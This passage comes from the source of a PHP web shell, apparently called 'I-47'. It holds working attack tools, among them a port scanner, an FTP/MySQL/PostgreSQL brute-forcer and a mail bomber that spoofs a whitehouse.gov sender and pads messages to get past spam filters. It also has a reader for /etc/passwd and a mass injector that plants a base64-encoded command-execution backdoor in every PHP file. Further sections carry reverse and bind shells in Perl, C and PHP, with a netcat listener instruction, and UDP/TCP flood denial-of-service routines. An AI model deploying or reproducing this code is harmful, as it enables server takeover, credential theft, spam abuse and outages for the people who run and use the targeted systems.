3286            </tr>
3287            <tr>
3288                <td align="center">
3289                <form name='scanner' method='post'>
3290                <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3291                </td>
3292                <td align="center">
3293                <select class="sbox" name='protocol'>
3294                    <option value='tcp'>tcp</option>
3295                    <option value='udp'>udp</option>
3296                </select>
3297                </td>
3298            <tr>
3299                <td colspan="2" align="center"><input class="but" type='submit' value='Scan Ports'></td>
3300            </tr>
3301            </form>
3302            
3303        <?php
3304                                     if (isset($_POST['host']) && isset($_POST['protocol'])) {
3305                                         echo "<tr><td colspan=2><font size='3' face='Verdana'>Open Ports: ";
3306                                         $host = $_POST['host'];
3307                                         $proto = $_POST['protocol'];
3308                                         $myports = array("21", "22", "23", "25", "59", "80", "113", "135", "445", "1025", "5000", "5900", "6660", "6661", "6662", "6663", "6665", "6666", "6667", "6668", "6669", "7000", "8080", "8018");
3309                                         for ($current = 0;$current <= 23;$current++) {
3310                                             $currents = $myports[$current];
3311                                             $service = getservbyport($currents, $proto);
3312                                             // Try to connect to port
3313                                             $result = fsockopen($host, $currents, $errno, $errstr, 1);
3314                                             // Show results
3315                                             if ($result) {
3316                                                 echo "<font color=lime size=3>$currents, </font>";
3317                                             }
3318                                         }
3319                                     }
3320                                     echo "</td></tr></table>";
3321 ?>
3322        <br>
3323        <form action="<?php echo $self; ?>" method="get">
3324        <input type="hidden" name="tools">
3325        <table cellpadding="5" border="2" style="width:50%;">
3326            <tr>
3327                <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3328            </tr>
3329            <tr>
3330                <td>Type : </td>
3331                <td>
3332                    <select name="prototype" class="sbox">
3333                        <option value="ftp">FTP</option>
3334                        <option value="mysql">MYSQL</option>
3335                        <option value="postgresql">PostgreSql</option>
3336                    </select>
3337                </td>
3338            </tr>
3339            <tr>
3340                <td>Server <b>:</b> Port : </td>
3341                <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3342            </tr>
3343            <tr>
3344                <td valign="middle">Brute type : </td>
3345                <td><label><input type=radio name=type value="1" checked> /etc/passwd</label><label><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label><hr>
3346                <input type=radio name=type value="2"> Dictionary</label><br>
3347                Login : &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="login" value="root" class="sbox"><br>
3348                Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3349                </td>
3350            </tr>
3351            <tr>
3352                <td colspan="2" align="center"><input type="submit" value="Attack >>" class="but"></td>
3353            </tr>
3354            </form>
3355            
3356        <?php
3357                                     if (isset($_GET['prototype'])) {
3358                                         echo '<tr><td colspan=2><h1>Results</h1><div><span>Type:</span> ' . htmlspecialchars($_GET['prototype']) . ' <span><br>Server:</span> ' . htmlspecialchars($_GET['serverport']) . '<br>';
3359                                         if ($_GET['prototype'] == 'ftp') {
3360                                             function BruteFun($ip, $port, $login, $pass) {
3361                                                 $fp = @ftp_connect($ip, $port ? $port : 21);
3362                                                 if (!$fp) return false;
3363                                                 $res = @ftp_login($fp, $login, $pass);
3364                                                 @ftp_close($fp);
3365                                                 return $res;
3366                                             }
3367                                         } elseif ($_GET['prototype'] == 'mysql') {
3368                                             function BruteFun($ip, $port, $login, $pass) {
3369                                                 $res = @mysql_connect($ip . ':' . $port ? $port : 3306, $login, $pass);
3370                                                 @mysql_close($res);
3371                                                 return $res;
3372                                             }
3373                                         } elseif ($_GET['prototype'] == 'pgsql') {
3374                                             function BruteFun($ip, $port, $login, $pass) {
3375                                                 $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres";
3376                                                 $res = @pg_connect($str);
3377                                                 @pg_close($res);
3378                                                 return $res;
3379                                             }
3380                                         }
3381                                         $success = 0;
3382                                         $attempts = 0;
3383                                         $server = explode(":", $_GET['server']);
3384                                         if ($_GET['type'] == 1) {
3385                                             $temp = @file('/etc/passwd');
3386                                             if (is_array($temp)) foreach ($temp as $line) {
3387                                                 $line = explode(":", $line);
3388                                                 ++$attempts;
3389                                                 if (BruteFun(@$server[0], @$server[1], $line[0], $line[0])) {
3390                                                     $success++;
3391                                                     echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
3392                                                 }
3393                                                 if (@$_GET['reverse']) {
3394                                                     $tmp = "";
3395                                                     for ($i = strlen($line[0]) - 1;$i >= 0;--$i) $tmp.= $line[0][$i];
3396                                                     ++$attempts;
3397                                                     if (BruteFun(@$server[0], @$server[1], $line[0], $tmp)) {
3398                                                         $success++;
3399                                                         echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
3400                                                     }
3401                                                 }
3402                                             }
3403                                         } elseif ($_GET['type'] == 2) {
3404                                             $temp = @file($_GET['dict']);
3405                                             if (is_array($temp)) foreach ($temp as $line) {
3406                                                 $line = trim($line);
3407                                                 ++$attempts;
3408                                                 if (BruteFun($server[0], @$server[1], $_GET['login'], $line)) {
3409                                                     $success++;
3410                                                     echo '<b>' . htmlspecialchars($_GET['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
3411                                                 }
3412                                             }
3413                                         }
3414                                         echo "<span>Attempts:</span> <font color=lime>$attempts</font> <span>Success:</span> <font color=lime>$success</font></div></td></tr>";
3415                                     }
3416 ?>
3417        
3418        </table>
3419        </center><br>
3420        <?php
3421                                 }
3422                                 // Mail
3423                                 else if (isset($_GET['mailbomb'])) { ?>
3424    <center><table><tr><td><a href="<?php echo $self; ?>?bomb&mailbomb"><font color="lime" size="4">| Mail Bomber |</font></a></td><td><a href="<?php echo $self; ?>?mail&mailbomb"><font color="lime" size="4">| Mass Mailer |</font></a></td></tr></table></center><br>
3425 <?php
3426                                     if (isset($_GET['bomb'])) {
3427                                         if (isset($_GET['to']) && isset($_GET['subject']) && isset($_GET['message']) && isset($_GET['times']) && $_GET['to'] != '' && $_GET['subject'] != '' && $_GET['message'] != '' && $_GET['times'] != '') {
3428                                             $times = $_GET['times'];
3429                                             while ($times--) {
3430                                                 if (isset($_GET['padding'])) {
3431                                                     $fromPadd = rand(0, 9999);
3432                                                     $subjectPadd = " -- ID : " . rand(0, 9999999);
3433                                                     $messagePadd = "
3434 
3435 ------------------------------
3436 " . rand(0, 99999999);
3437                                                 }
3438                                                 $from = "president$fromPadd@whitehouse.gov";
3443                                                 if (!mail($_GET['to'], $_GET['subject'] . $subjectPadd, $_GET['message'] . $messagePadd, "From:" . $from)) {
3444                                                     $error = 1;
3445                                                     echo "<center><font color=red size=3><blink>Some Error Occurred!</blink></font></center>";
3446                                                     break;
3447                                                 }
3448                                             }
3449                                             if ($error != 1) {
3450                                                 echo "<center><font color=lime size=3><blink>Mail(s) Sent!</blink></font></center>";
3451                                             }
3452                                         } else {
3453 ?>
3454            <form method="GET">
3455                <input type="hidden" name="bomb" />
3456                <input type="hidden" name="mailbomb" />
3457                <table id="margins" style="width:100%;">
3458                    <tr>
3459                        <td style="width:30%;">
3460                            To 
3461                        </td>
3462                        <td>
3463                            <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3488                        </td>
3489                    </tr>
3490                    
3491                    <tr>
3492                        <td style="width:30%;">
3493                            Subject
3494                        </td>
3495                        <td>
3496                            <input type="text" class="box" name="subject" value="I-47 Here!" onFocus="if(this.value == 'I-47 Here!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!';" />
3497                        </td>
3498                    </tr>
3499                     <tr>
3500                        <td style="width:30%;">
3501                            No. of Times  
3502                        </td>
3503                        <td>
3504                            <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3505                        </td>
3506                    </tr>
3507           
3508                    <tr>
3509                        <td style="width:30%;">
3510                            
3511                            Pad your message (Less spam detection)
3512                            
3513                        </td>
3514                        <td>
3515                        
3516                            <input type="checkbox" name="padding"/>
3517                              
3518                        </td>
3519                    </tr>
3520                    <tr>
3521                        <td colspan="2">
3522                            <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!</textarea>
3523                        </td>
3524                    </tr>
3525                    
3526                    
3527                    <tr>
3528                        <td rowspan="2">
3529                            <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="    Bomb!  "/>
3530                        </td>
3531                    </tr>
3532                </table>            
3533            </form>   
3534            <?php
3535                                         }
3536                                     }
3537                                     //Mass Mailer
3538                                     else if (isset($_GET['mail'])) {
3539                                         if (isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message'])) {
3540                                             if (mail($_GET['to'], $_GET['subject'], $_GET['message'], "From:" . $_GET['from'])) {
3541                                                 echo "<center><font color=lime size=3><blink>Mail Sent!</blink></font></center>";
3542                                             } else {
3543                                                 echo "<center><font color=red size=3><blink>Some Error Occurred!</blink></font></center>";
3544                                             }
3545                                         } else {
3546 ?>
3547        <div align="left">
3548         <form method="GET">
3549             <input type="hidden" name="mail" />
3550            <input type="hidden" name="mailbomb" />
3551             <table align="left" style="width:100%;">
3552                 <tr>
3553                     <td style="width:10%;">From</td>
3554                     <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3567                 </tr>
3568                 
3569                 <tr>
3570                     <td style="width:20%;">To</td>
3571                     <td style="width:80%;"><input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3596                 </tr>
3597                 
3598                 <tr>
3599                     <td style="width:20%;">Subject</td>
3600                     <td style="width:80%;"><input type="text" class="box" name="subject" value="I-47 Here!!" onFocus="if(this.value == 'I-47 Here!!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!!';" /></td>
3601                 </tr>
3602                 
3603                 
3604                 <tr>
3605                     <td colspan="2">
3606                         <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!!</textarea>
3607                     </td>
3608                 </tr>
3609                 
3610                 
3611                 <tr>
3612                     <td rowspan="2">
3613                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="   Send! "/>
3614                     </td>
3615                 </tr>
3616             </table>            
3617         </form></div>   
3618         <?php
3619                                         }
3620                                     }
3621                                 }
3622                                 // View Passwd file
3623                                 else if (isset($_GET['passwd'])) {
3624                                     $test = '';
3625                                     $tempp = tempnam($test, "cx");
3626                                     $get = "/etc/passwd";
3627                                     if (copy("compress.zlib://" . $get, $tempp)) {
3628                                         $fopenzo = fopen($tempp, "r");
3629                                         $freadz = fread($fopenzo, filesize($tempp));
3630                                         fclose($fopenzo);
3631                                         $source = htmlspecialchars($freadz);
3632                                         echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3633                                         unlink($tempp);
3634                                     } else {
3635                                         if (isset($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2'])) {
3636                                             $temp = "";
3637                                             for (;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++) {
3638                                                 $uid = @posix_getpwuid($_GET['val1']);
3639                                                 if ($uid) $temp.= join(':', $uid) . "
3640 ";
3641                                             }
3642                                             echo '<br/>';
3643                                             paramexe('Users', $temp);
3644                                         } else {
3645 ?>
3646            <form>
3647                <input type="hidden" name="passwd">
3648                <table border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3649                <tr>
3650                    <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3651                </tr>
3652                <tr>
3653                    <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3654                </tr>
3655                <tr>
3656                    <td colspan="2" align="center"><input type="submit" value="  Go  " class="but"></td>
3657                </tr>
3658                </table><br>
3659            </form>
3660            <?php
3661                                         }
3662                                     }
3663                                 }
3664                                 // Code Injector
3665                                 else if (isset($_GET['injector'])) {
3666 ?>
3667         <table id="margins" >
3668         <tr>
3669             <form method='POST'>
3670             <input type="hidden" name="injector"/>  
3671                 <tr>
3672                     <td width="100" class="title">
3673                         Directory
3674                     </td>
3675                     <td>
3676                          <input class="box" name="pathtomass" value="<?php echo getcwd() . $SEPARATOR; ?>" />
3677                     </td>
3678                 </tr>
3679                 <tr>
3680                 <td class="title">
3681                     Mode
3682                 </td>
3683                 <td>
3684                         <select style="width: 400px;" name="mode" class="box">
3685                             <option value="Apender">Apender</option>
3686                             <option value="Overwriter">Overwriter</option>
3687                         </select>
3688                 </td>
3689                 </tr>
3690                 <tr>
3691                     <td class="title">
3692                         File Type
3693                     </td>
3694                     <td>
3695                         <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3696                     </td>
3697                 </tr>
3698                 <tr>
3699                    <td>Create A backdoor by injecting this code in every php file of current directory</td>
3700                </tr>
3701                 
3702                 <tr>
3703                     <td colspan="2">
3704                         <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3705                     </td>
3706                 </tr>
3707                 
3708                 
3709                 <tr>
3710                     <td rowspan="2">
3711                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
3712                     </td>
3713                 </tr>
3714         </form>
3715         </table>
3716         <?php
3717                                 }
3718                                 // Connect
3719                                 else if (isset($_GET['connect'])) {
3720                                     if (isset($_POST['ip']) && isset($_POST['port']) && $_POST['ip'] != "" && $_POST['port'] != "") {
3721                                         $host = $_POST['ip'];
3722                                         $port = $_POST['port'];
3723                                         if ($_POST["lang"] == "perl") {
3724                                             if (is_writable(".")) {
3725                                                 @$fh = fopen(getcwd() . "/bc.pl", 'w');
3726                                                 @fwrite($fh, gzinflate(base64_decode($backconnect_perl)));
3727                                                 @fclose($fh);
3728                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3729                                                 execmd("perl " . getcwd() . "/bc.pl $host $port", $disable);
3730                                                 if (!@unlink(getcwd() . "/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
3731                                             } else {
3732                                                 @$fh = fopen("/tmp/bc.pl", "w");
3733                                                 @fwrite($fh, gzinflate(base64_decode($backconnect_perl)));
3734                                                 @fclose($fh);
3735                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3736                                                 execmd("perl /tmp/bc.pl $host $port", $disable);
3737                                                 if (!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program</h2></font></br>";
3738                                             }
3739                                         } else if ($_POST["lang"] == "c") {
3740                                             if (is_writable(".")) {
3741                                                 $w_file = @fopen("backc", "w") or err();
3742                                                 if ($w_file) {
3743                                                     @fputs($w_file, base64_decode($back_connect_c));
3744                                                     @fclose($w_file);
3745                                                 }
3746                                                 chmod('backc', 0777);
3747                                                 //$blah = ex("gcc back.c -o backc");
3748                                                 $blah = execmd("./backc " . $host . " " . $port . " &");
3749                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3750                                                 $_POST['backcconnmsg'] = "Trying to connect to <b>" . $host . "</b> on port <b>" . $port . "</b>.";
3751                                                 //if (file_exists("back.c")) { unlink("back.c"); }
3752                                                 if (file_exists("backc")) {
3753                                                     unlink("backc");
3754                                                 }
3755                                             } else {
3756                                                 chmod('/tmp/backc', 0777);
3757                                                 $w_file = @fopen("/tmp/backc", "w") or err();
3758                                                 if ($w_file) {
3759                                                     @fputs($w_file, base64_decode($back_connect_c));
3760                                                     @fclose($w_file);
3761                                                 }
3762                                                 //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
3763                                                 $blah = execmd("./backc " . $host . " " . $port . " &");
3764                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3765                                                 $_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>.";
3766                                                 //if (file_exists("back.c")) { unlink("back.c"); }
3767                                                 if (file_exists("/tmp/backc")) {
3768                                                     unlink("/tmp/backc");
3769                                                 }
3770                                             }
3771                                         } else if ($_POST["lang"] == "php") {
3772                                             echo "<font color='#FFFFFF' size=3>Attempting to connect...</font>";
3773                                             $ip = $_POST['ip'];
3774                                             $port = $_POST['port'];
3775                                             $sockfd = fsockopen($ip, $port, $errno, $errstr);
3776                                             if ($errno != 0) {
3777                                                 echo "<font color='red'><b>$errno</b> : $errstr</font>";
3778                                             } else if (!$sockfd) {
3779                                                 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
3780                                             } else {
3781                                                 fputs($sockfd, "
3782 =================================================================
3783 Coded By Arjun
3784 =================================================================");
3785                                                 $pwd = exec_all("pwd");
3786                                                 $sysinfo = exec_all("uname -a");
3787                                                 $id = exec_all("id");
3788                                                 $len = 1337;
3789                                                 fputs($sockfd, $sysinfo . "
3790 ");
3791                                                 fputs($sockfd, $pwd . "
3792 ");
3793                                                 fputs($sockfd, $id . "
3794 
3795 ");
3796                                                 fputs($sockfd, $dateAndTime . "
3797 
3798 ");
3799                                                 while (!feof($sockfd)) {
3800                                                     $cmdPrompt = "(I47)[$]> ";
3801                                                     fputs($sockfd, $cmdPrompt);
3802                                                     $command = fgets($sockfd, $len);
3803                                                     fputs($sockfd, "
3804 " . exec_all($command) . "
3805 
3806 ");
3807                                                 }
3808                                                 fclose($sockfd);
3809                                             }
3810                                         }
3811                                     } else if (isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang'])) {
3812                                         $passwd = $_POST['passwd'];
3813                                         if ($_POST['lang'] == 'c') {
3814                                             if (is_writable(".")) {
3815                                                 @$fh = fopen(getcwd() . "/bp.c", 'w');
3816                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_c)));
3817                                                 @fclose($fh);
3818                                                 execmd("chmod " . getcwd() . "/bp.c 0755");
3819                                                 execmd("gcc -o " . getcwd() . "/bp " . getcwd() . "/bp.c");
3820                                                 execmd("chmod " . getcwd() . "/bp 0755");
3821                                                 $out = execmd(getcwd() . "/bp" . " " . $_POST['port'] . " " . $passwd . " &");
3822                                                 echo "<pre>$out
3823 " . execmd("ps aux | grep bp.pl") . "</pre>";
3824                                             } else {
3825                                                 @$fh = fopen("/tmp/bp.c", "w");
3826                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_c)));
3827                                                 @fclose($fh);
3828                                                 execmd("chmod /tmp/bp.c 0755");
3829                                                 execmd("gcc -o /tmp/bp /tmp/bp.c");
3830                                                 $out = execmd("/tmp/bp" . " " . $_POST['port'] . " " . $passwd . " &");
3831                                                 echo "<pre>$out
3832 " . execmd("ps aux | grep bp") . "</pre>";
3833                                             }
3834                                         }
3835                                         if ($_POST['lang'] == 'perl') {
3836                                             if (is_writable(".")) {
3837                                                 @$fh = fopen(getcwd() . "/bp.pl", 'w');
3838                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_p)));
3839                                                 @fclose($fh);
3840                                                 execmd("chmod " . getcwd() . "/bp.pl 0755");
3841                                                 $out = execmd("perl " . getcwd() . "/bp.pl" . " " . $passwd . " &");
3842                                                 echo "<pre>$out
3843 " . execmd("ps aux | grep bp.pl") . "</pre>";
3844                                             } else {
3845                                                 @$fh = fopen("/tmp/bp.pl", "w");
3846                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_p)));
3847                                                 @fclose($fh);
3848                                                 $out = execmd("perl /tmp/bp.pl " . $passwd . " &");
3849                                                 echo "<pre>$out
3850 " . execmd("ps aux | grep bp.pl") . "</pre>";
3851                                             }
3852                                         }
3853                                     } else {
3854 ?>       
3855     <table style="width:50%" align="center" >
3856     <tr>
3857         <th colspan="1" width="50px">Reverse Shell</th>
3858         <th colspan="1" width="50px">Bind Shell</th>
3859     </tr>
3860     <tr>
3861         <form action='<?php echo $self; ?>?connect' method='post' >  
3862          <td>
3863             <table style="border-spacing: 6px;">
3864                 <tr>
3865                     <td>IP </td>
3866                     <td>
3867                         <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip(); ?>" />
3868                     </td>
3869                 </tr>
3870                 <tr>
3871                     <td>Port </td>
3872                     <td><input style="width: 200px;" class="box" name="port" size='5' value="21"/></td>
3873                </tr>
3874                <tr>
3875                    <td style="vertical-align:top;">Use:</td> 
3876                    <td><select style="width: 95px;" name="lang" class="sbox">
3877                        <option value="perl">Perl</option>
3878                        <option value="c">C</option>
3879                        <option value="php">PHP</option>
3880                        </select>&nbsp;&nbsp;
3881                    <input style="width: 90px;" class="but" type="submit" value="Connect!"/></td>
3882                    
3883                </tr>
3884             </table>
3885          </td>
3886       </form> 
3887          <form action='<?php echo $self; ?>?connect' method='post' >
3888          <td style="vertical-align:top;">
3889             <table style="border-spacing: 6px;">
3890                 <tr>
3891                     <td>Port</td>
3892                     <td>
3893                         <input style="width: 200px;" class="box" name="port" value="21" />
3894                     </td>
3895                 </tr>
3896                 <tr>
3897                     <td>Password </td>
3898                     <td>
3899                        <input style="width: 200px;" class="box" name="passwd" value="I-47"/>
3900                    </td>
3901                    <tr>
3902                        <td>Using</td>
3903                        <td>
3904                        <select style="width: 95px;" name="lang" id="lang" class="sbox">
3905                        <option value="perl">Perl</option>
3906                        <option value="c">C</option>
3907                        </select>&nbsp;&nbsp;
3908                        <input style="width: 90px;" class="but" type="submit" value=" Bind "/></td>
3909                 </tr>
3910             </table>
3911          </td>
3912          </form>
3913     </tr>
3914     </table>
3915    <div align="center"><font color="#FF0000" size="3">Click "Connect" only after open port for it. You should use NetCat, run "nc -l -n -v -p 21"!</font></div>
3916     <p align="center"><font color="#FF0000" size="3">Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</font></p>
3917 <?php
3918                                     }
3919                                 }
3920                                 //fuzzer
3921                                 else if (isset($_GET['fuzz'])) {
3922                                     if (isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['times']) && isset($_GET['time']) && isset($_GET['message']) && isset($_GET['messageMultiplier']) && $_GET['message'] != "" && $_GET['time'] != "" && $_GET['times'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['messageMultiplier'] != "") {
3923                                         $IP = $_GET['ip'];
3924                                         $port = $_GET['port'];
3925                                         $times = $_GET['times'];
3926                                         $timeout = $_GET['time'];
3927                                         $send = 0;
3928                                         $ending = "";
3929                                         $multiplier = $_GET['messageMultiplier'];
3930                                         $data = "";
3931                                         $mode = "tcp";
3932                                         $data.= "GET /";
3933                                         $ending.= " HTTP/1.1
3934 
3935 
3936 
3937 
3938 ";
3939                                         if ($_GET['type'] == "tcp") {
3940                                             $mode = "tcp";
3941                                         }
3942                                         while ($multiplier--) {
3943                                             $data.= urlencode($_GET['message']);
3944                                         }
3945                                         $data.= "%s%s%s%s%d%x%c%n%n%n%n"; // add some format string specifiers
3946                                         $data.= "by-I-47" . $ending;
3947                                         $length = strlen($data);
3948                                         echo "Sending Data :- <br /> <p align='center'>$data</p>";
3949                                         print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
3950                                         for ($i = 0;$i < $times;$i++) {
3951                                             $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
3952                                             if ($socket) {
3953                                                 fwrite($socket, $data, $length);
3954                                                 fclose($socket);
3955                                             }
3956                                         }
3957                                         echo "<script>alert('Fuzzing Completed!');</script>";
3958                                         echo "DOS attack against $mode://$IP:$port completed on " . date("h:i:s A") . "<br />";
3959                                         echo "Total Number of Packets Sent : " . $times . "<br />";
3960                                         echo "Total Data Sent = " . HumanReadableFilesize($times * $length) . "<br />";
3961                                         echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
3962                                     } else {
3963 ?>
3964         <form method="GET">
3965             <input type="hidden" name="fuzz" />
3966             <table id="margins">
3967                 <tr>
3968                     <td width="400" class="title">
3969                         IP
3970                     </td>
3971                     <td>
3972                         <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3973                     </td>
3974                 </tr>
3975                 
3976                 <tr>
3977                     <td class="title">
3978                         Port
3979                     </td>
3980                     <td>
3981                         <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3982                     </td>
3983                 </tr>
3984                 
3985                 <tr>
3986                     <td class="title">
3987                         Timeout
3988                     </td>
3989                     <td>
3990                         <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3991                     </td>
3992                 </tr>
3993                 
3994                 
3995                 <tr>
3996                     <td class="title">
3997                         No of times
3998                     </td>
3999                     <td>
4000                         <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4001                     </td>
4002                 </tr>
4003                 
4004                 <tr>
4005                     <td class="title">
4006                         Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
4007                     </td>
4008                     <td>
4009                         <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4010                     </td>
4011                     <td>
4012                         x
4013                     </td>
4014                     <td width="20">
4015                         <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4016                     </td>
4017                 </tr>
4018                 
4019                 <tr>
4020                     <td rowspan="2">
4021                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value="  Submit  "/>
4022                     </td>
4023                 </tr>
4024             </table>            
4025         </form>
4026         <?php
4027                                     }
4028                                 }
4029                                 //DDos
4030                                 else if (isset($_GET['dos'])) {
4031                                     if (isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "") {
4032                                         $IP = $_GET['ip'];
4033                                         $port = $_GET['port'];
4034                                         $executionTime = $_GET['exTime'];
4035                                         $noOfBytes = $_GET['noOfBytes'];
4036                                         $data = "";
4037                                         $timeout = $_GET['timeout'];
4038                                         $packets = 0;
4039                                         $counter = $noOfBytes;
4040                                         $maxTime = time() + $executionTime;;
4041                                         while ($counter--) {
4042                                             $data.= "X";
4043                                         }
4044                                         $data.= " I-47";
4045                                         print "I am at ma Work now :D ;D! Dont close this window untill you recieve a message <br>";
4046                                         while (1) {
4047                                             $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4048                                             if ($socket) {
4049                                                 fwrite($socket, $data);
4050                                                 fclose($socket);
4051                                                 $packets++;
4052                                             }
4053                                             if (time() >= $maxTime) {
4054                                                 break;
4055                                             }
4056                                         }
4057                                         echo "<script>alert('Dos Completed!');</script>";
4058                                         echo "DOS attack against udp://$IP:$port completed on " . date("h:i:s A") . "<br />";
4059                                         echo "Total Number of Packets Sent : " . $packets . "<br />";
4060                                         echo "Total Data Sent = " . HumanReadableFilesize($packets * $noOfBytes) . "<br />";
4061                                         echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
4062                                     } else {
4063 ?>
4064            <form method="GET">
4065                <input type="hidden" name="dos" />
4066                <table id="margins">
4067                    <tr>
4068                        <td width="400" class="title">
4069                            IP
4070                        </td>
4071                        <td>
4072                            <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4073                        </td>
4074                    </tr>
4075                    
4076                    <tr>
4077                        <td class="title">
4078                            Port
4079                        </td>
4080                        <td>
4081                            <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4082                        </td>
4083                    </tr>
4084                    
4085                    <tr>
4086                        <td class="title">
4087                            Timeout <font color="red">(Time in seconds)</font>
4088                        </td>
4089                        <td>
4090                            <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
4091                        </td>
4092                    </tr>
4093                    
4094                    
4095                    <tr>
4096                        <td class="title">
4097                            Execution Time <font color="red">(Time in seconds)</font> 
4098                        </td>
4099                        <td>
4100                            <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
4101                        </td>
4102                    </tr>
4103                    
4104                    <tr>
4105                        <td class="title">
4106                            No of Bytes per/packet
4107                        </td>
4108                        <td>
4109                            <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
4110                        </td>
4111                    </tr>
4112                    
4113    
4114                    <tr>
4115                        <td rowspan="2">
4116                            <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value="   Attack >> "/>
4117                        </td>
4118                    </tr>
4119                </table>            
4120            </form>
4121            <?php
4122                                     }
4123                                 }
4124                                 // Sec info
